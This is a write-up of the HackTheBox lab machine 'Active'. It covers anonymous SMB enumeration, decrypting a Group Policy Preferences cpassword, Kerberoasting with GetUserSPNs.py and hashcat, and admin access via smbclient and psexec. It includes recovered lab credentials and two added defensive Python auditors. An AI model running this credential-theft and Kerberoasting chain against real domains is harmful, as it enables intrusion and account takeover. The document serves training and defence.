Active
#ActiveDirectory #Default_Credentials #Weak_Permissions #Anonymous_Access
Active is an easy-rated Windows machine from HackTheBox, created by eks and mrb3n. In this post, my IP is 10.10.14.210 and the target IP is 10.129.38.41.
Recon
The first steps are about gathering basic information on the target, using nmap and looking for information on the website.
ping -c 1 10.129.38.41
PING 10.129.38.41 (10.129.38.41) 56(84) bytes of data.
64 bytes from 10.129.38.41: icmp_seq=1 ttl=63 time=202 ms
--- 10.129.38.41 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 202.335/202.335/202.335/0.000 ms
What a weird TTL for a Windows Machine...
nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.38.41
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 126
88/tcp open kerberos-sec syn-ack ttl 126
135/tcp open msrpc syn-ack ttl 126
139/tcp open netbios-ssn syn-ack ttl 126
389/tcp open ldap syn-ack ttl 126
445/tcp open microsoft-ds syn-ack ttl 126
464/tcp open kpasswd5 syn-ack ttl 126
593/tcp open http-rpc-epmap syn-ack ttl 126
636/tcp open ldapssl syn-ack ttl 126
3268/tcp open globalcatLDAP syn-ack ttl 126
3269/tcp open globalcatLDAPssl syn-ack ttl 126
5722/tcp open msdfsr syn-ack ttl 126
9389/tcp open adws syn-ack ttl 126
47001/tcp open winrm syn-ack ttl 126
49153/tcp open unknown syn-ack ttl 126
49154/tcp open unknown syn-ack ttl 126
49155/tcp open unknown syn-ack ttl 126
49157/tcp open unknown syn-ack ttl 126
49158/tcp open unknown syn-ack ttl 126
49162/tcp open unknown syn-ack ttl 126
49166/tcp open unknown syn-ack ttl 126
49168/tcp open unknown syn-ack ttl 126
Next we run version detection and the default scripts with nmap against each open port.
nmap -sCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49153,49154,49155,49157,49158,49162,49166,49168 10.129.38.41
Nmap scan report for 10.129.38.41
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-26 21:17:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49168/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-08-26T21:18:39
|_ start_date: 2024-08-26T18:53:23
Quite a few open ports, which is normal on Windows. For now we are interested in the ports that serve SMB, 139 and 445, so we will explore them with the basic tools.
SMB Enumeration
enum4linux -a 10.129.38.41
=================================( Share Enumeration on 10.129.38.41 )================
do_connect: Connection to 10.129.38.41 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.129.38.41
//10.129.38.41/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/C$ Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/IPC$ Mapping: OK Listing: DENIED Writing: N/A
//10.129.38.41/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/Replication Mapping: OK Listing: OK Writing: N/A
//10.129.38.41/SYSVOL Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/Users Mapping: DENIED Listing: N/A Writing: N/A
The only relevant information comes from "Share Enumeration," where we list the shared resources and determine which ones are visible to the Anonymous user; in this case, it is "Replication." Now, we will review it using smbclient or smbmap.
Exploring Replication
With smbclient, you can explore manually, but with smbmap, you can recursively extract all the files that you have permission to read.
smbclient //10.129.38.41/Replication -U ""%""
smbmap -H 10.129.38.41 -s Replication -r --depth 10
./Replication
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 active.htb
./Replication//active.htb
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 DfsrPrivate
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Policies
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 scripts
./Replication//active.htb/DfsrPrivate
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ConflictAndDeleted
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Deleted
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Installing
./Replication//active.htb/Policies
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
fr--r--r-- 23 Sat Jul 21 10:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Group Policy
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 USER
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
fr--r--r-- 119 Sat Jul 21 10:38:11 2018 GPE.INI
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Microsoft
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Preferences
fr--r--r-- 2788 Sat Jul 21 10:38:11 2018 Registry.pol
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Windows NT
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 SecEdit
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
fr--r--r-- 1098 Sat Jul 21 10:38:11 2018 GptTmpl.inf
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Groups
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
fr--r--r-- 533 Sat Jul 21 10:38:11 2018 Groups.xml
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
fr--r--r-- 22 Sat Jul 21 10:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 USER
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Microsoft
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Windows NT
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 SecEdit
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
fr--r--r-- 3722 Sat Jul 21 10:38:11 2018 GptTmpl.inf
From the entire list of folders and files, the only thing that seems relevant is "Groups.xml." Let's access and explore the file.
smbclient //10.129.38.41/Replication -U ""%""
$ cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
$ get Groups.xml
$ exit
cat Groups.xml | xmllint --format -
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
</User>
</Groups>
The Groups.xml file appears to be a record created when a user is added through Group Policy Preferences (GPP). This is valuable information because, to use the active.htb\SVC_TGS account, we only need to decrypt its password.
Password Decryption
Since it is a cpassword from GPP (Group Policy Preferences), we can use the following method to decrypt it. Decryption is possible because the AES key used to protect cpassword values is fixed and was published by Microsoft, which is why storing passwords in GPP was disabled in MS14-025:
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
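From the defender's side, the same weakness is found by auditing SYSVOL for preference files that still carry a cpassword attribute. The following Python script is an added example for this write-up (not the post's own code and not gpp-decrypt): it walks a directory tree laid out like the Replication share, reports every cpassword it finds together with the account it belongs to, and shows that the blob on this page is a 64-byte ciphertext once the base64 padding GPP strips is restored. The sample Groups.xml is reconstructed from the file shown above; the Drives.xml without a cpassword, its GUIDs and the share path are constructed placeholders.

```python
"""Audit a SYSVOL-style tree for Group Policy Preferences cpassword attributes.
Added example for this write-up; standard library only."""
import base64
import os
import tempfile
import xml.etree.ElementTree as ET

# Preference files that can carry a cpassword attribute (see MS14-025).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# cpassword value taken from the Groups.xml shown in the write-up.
SAMPLE_CPASSWORD = ("edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xU"
                    "jTLfCuNH8pG5aSVYdYw/NglVmQ")

# Reconstructed from the write-up's Groups.xml (constructed sample data).
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description="" cpassword=\"""" + SAMPLE_CPASSWORD + """\" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""

# A clean preference file (placeholder GUIDs and path): must NOT be reported.
SAMPLE_DRIVES_XML = """<?xml version="1.0" encoding="utf-8"?>
<Drives clsid="{00000000-0000-0000-0000-000000000001}">
  <Drive clsid="{00000000-0000-0000-0000-000000000002}" name="H:">
    <Properties action="U" path="\\\\dc\\home" label="Home"/>
  </Drive>
</Drives>
"""


def pad_cpassword(cpassword: str) -> str:
    """GPP strips the base64 '=' padding; restore it so the blob decodes."""
    return cpassword + "=" * (-len(cpassword) % 4)


def cpassword_ciphertext_len(cpassword: str) -> int:
    """Length of the decoded ciphertext; a valid blob is a multiple of the
    16-byte AES block size (64 here, i.e. four blocks of UTF-16LE password)."""
    return len(base64.b64decode(pad_cpassword(cpassword)))


def find_cpasswords(root_dir):
    """Walk root_dir and return (relative path, account, cpassword) for every
    Properties element in a GPP file that still carries a cpassword."""
    hits = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for fname in files:
            if fname not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fname)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # malformed policy file: a real audit should log this
            for props in tree.iter("Properties"):
                cpw = props.get("cpassword")
                if not cpw:
                    continue
                # Different preference types name the account differently.
                account = (props.get("userName") or props.get("accountName")
                           or props.get("runAs") or "?")
                hits.append((os.path.relpath(path, root_dir), account, cpw))
    return hits


def build_sample_sysvol() -> str:
    """Create a throwaway tree mirroring the Replication share layout from the
    write-up and return its path (constructed sample data)."""
    root = tempfile.mkdtemp(prefix="sysvol_sample_")
    prefs = os.path.join(root, "active.htb", "Policies",
                         "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                         "MACHINE", "Preferences")
    os.makedirs(os.path.join(prefs, "Groups"))
    os.makedirs(os.path.join(prefs, "Drives"))
    with open(os.path.join(prefs, "Groups", "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    with open(os.path.join(prefs, "Drives", "Drives.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_DRIVES_XML)
    return root


if __name__ == "__main__":
    for rel, account, cpw in find_cpasswords(build_sample_sysvol()):
        print(f"{rel}: {account} cpassword={cpw[:12]}... "
              f"({cpassword_ciphertext_len(cpw)} ciphertext bytes)")
```

Point the script at a mounted copy of SYSVOL (or at a directory pulled with smbmap, as above) instead of the constructed tree; any hit means the password must be considered exposed to every domain user who can read SYSVOL, and the GPP item should be removed and the account's password rotated.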
Enumeration with active.htb
Now that we have a username and password, we enumerate the shares again, this time with these credentials, to see what access they give us.
smbmap -H 10.129.38.41 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
[+] IP: 10.129.38.41:445 Name: 10.129.38.41 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
From this list, "Users" seems to be the most interesting... As usual, the flag is likely to be on the user's Desktop. Keep in mind that to log in you must use the account the password belongs to; in this case, that account is "SVC_TGS."
smbclient //10.129.38.41/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18
$ cd \SVC_TGS\Desktop\
$ get user.txt
$ exit
cat user.txt
13a4dcb3da9553209d0833afc10a437d
Within the Impacket suite, there's a script called GetUserSPNs.py that is very useful for finding accounts vulnerable to Kerberoasting. This attack targets Service Principal Names (SPNs) associated with user accounts in Active Directory that are used for Kerberos authentication. When the script prompts for a password, use GPPstillStandingStrong2k18.
GetUserSPNs.py -request -dc-ip 10.129.38.41 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 19:06:40.351723 2024-08-26 18:54:29.034950
cat GetUserSPNs.out
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b9207b9c412fc833f5e326aa92d7950a${...}
Now we just need to crack the hash. The good news is that the script outputs the ticket in a format compatible with Hashcat (mode 13100), which makes cracking straightforward.
$ hashcat -m 13100 -a 0 GetUserSPNs.out /shared/payload/rockyou.txt --force
$ hashcat -m 13100 -a 0 GetUserSPNs.out /shared/payload/rockyou.txt --force --show
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b9207b9c412fc833f5e326aa92d7950a{...}{...}7c0:Ticketmaster1968
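The `$krb5tgs$23$` header is worth reading before anything is cracked: the `23` is the Kerberos encryption type (RC4-HMAC), and it is the reason mode 13100 is fast, since the RC4 key is the account's NT hash and each guess costs one MD4 plus one HMAC-MD5. The following Python is an added example for this write-up, not code from the post or from Impacket: it parses the hashcat 13100 layout that GetUserSPNs.py emits for RC4 tickets, pulls out the account and SPN, and flags the weak encryption type so a defender can see which service accounts to move to AES-only keys (or to gMSA) and long passwords. The sample line reuses the header shown above with a constructed ticket body; the AES layouts (hashcat 19600/19700) are deliberately rejected rather than guessed.

```python
"""Parse Kerberoast output in hashcat 13100 ($krb5tgs$23$) format and flag
accounts whose service tickets were issued with RC4-HMAC.
Added example for this write-up; standard library only."""
import re
from dataclasses import dataclass

# Kerberos encryption types as they appear after "$krb5tgs$".
ETYPE_NAMES = {17: "AES128-CTS-HMAC-SHA1-96",
               18: "AES256-CTS-HMAC-SHA1-96",
               23: "RC4-HMAC"}

# Layout GetUserSPNs.py uses for etype 23 (hashcat mode 13100):
#   $krb5tgs$23$*<user>$<REALM>$<spn>*$<16-byte checksum hex>$<encrypted ticket hex>
# The AES layouts put the user outside the asterisks and are not parsed here.
KRB5TGS23_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>23)\$\*(?P<user>[^$*]+)\$(?P<realm>[^$*]+)\$"
    r"(?P<spn>[^$*]+)\*\$(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)

# Constructed sample: header from the write-up, ticket body made up.
SAMPLE_LINE = ("$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*"
               "$b9207b9c412fc833f5e326aa92d7950a$" + "0011223344556677" * 4)


@dataclass
class RoastedTicket:
    user: str
    realm: str
    spn: str
    etype: int
    checksum: str       # HMAC-MD5 over the ticket, 16 bytes as hex
    ticket_bytes: int   # length of the encrypted ticket part

    @property
    def etype_name(self) -> str:
        return ETYPE_NAMES.get(self.etype, f"unknown({self.etype})")

    @property
    def weak_etype(self) -> bool:
        # RC4-HMAC keys are the NT hash of the account password, so an
        # offline guess is one MD4 + one HMAC-MD5: cheap to brute-force.
        return self.etype == 23


def parse_krb5tgs(line: str) -> RoastedTicket:
    """Parse one $krb5tgs$23$ line; raises ValueError for any other layout."""
    m = KRB5TGS23_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5tgs$23$ line in the GetUserSPNs/hashcat-13100 layout")
    return RoastedTicket(user=m["user"], realm=m["realm"], spn=m["spn"],
                         etype=int(m["etype"]), checksum=m["checksum"].lower(),
                         ticket_bytes=len(m["edata"]) // 2)


def audit_tickets(lines):
    """Return (account, spn, etype name, weak?) per parseable line, skipping
    blank lines and layouts this parser does not understand."""
    report = []
    for line in lines:
        if not line.strip():
            continue
        try:
            t = parse_krb5tgs(line)
        except ValueError:
            continue
        report.append((f"{t.realm}\\{t.user}", t.spn, t.etype_name, t.weak_etype))
    return report


if __name__ == "__main__":
    for account, spn, etype, weak in audit_tickets([SAMPLE_LINE]):
        flag = "WEAK: move to AES-only keys / long password" if weak else "ok"
        print(f"{account} ({spn}) issued with {etype}: {flag}")
```

Run it over the GetUserSPNs.out file from the write-up (the `-outputfile` path above) to list every roastable account and its encryption type in one pass; an account with an SPN that still gets RC4 tickets is the one to prioritise, because that is exactly the case the page's hashcat run shows being cracked from a wordlist.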
Great! With the password "Ticketmaster1968," we can now check what the admin account has access to—potentially everything. The next step is to access the SMB share and extract the flag.
smbmap -H 10.129.38.41 -d active.htb -u administrator -p Ticketmaster1968
[+] IP: 10.129.38.41:445 Name: 10.129.38.41 Status: ADMIN!!!
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ, WRITE Logon server share
Replication READ ONLY
SYSVOL READ, WRITE Logon server share
Users READ ONLY
With admin status confirmed, you have elevated privileges. When exploring the SMB shares, the C$ share represents the root of the C: drive, which is the most important one and often contains critical files, including potential flags or sensitive information.
smbclient //10.129.38.41/C$ -U active.htb\\administrator%Ticketmaster1968
$ cd \users\administrator\desktop\
$ get root.txt
$ exit
cat root.txt
ce53b45c12214816f72f7f69ae9ecce4
Alternative
With the credentials confirmed as valid, you can use them to gain shell access on the target system. Given the password "Ticketmaster1968," you can attempt to connect via different methods like SMB or WinRM to obtain a shell.
psexec.py active.htb/administrator@10.10.10.100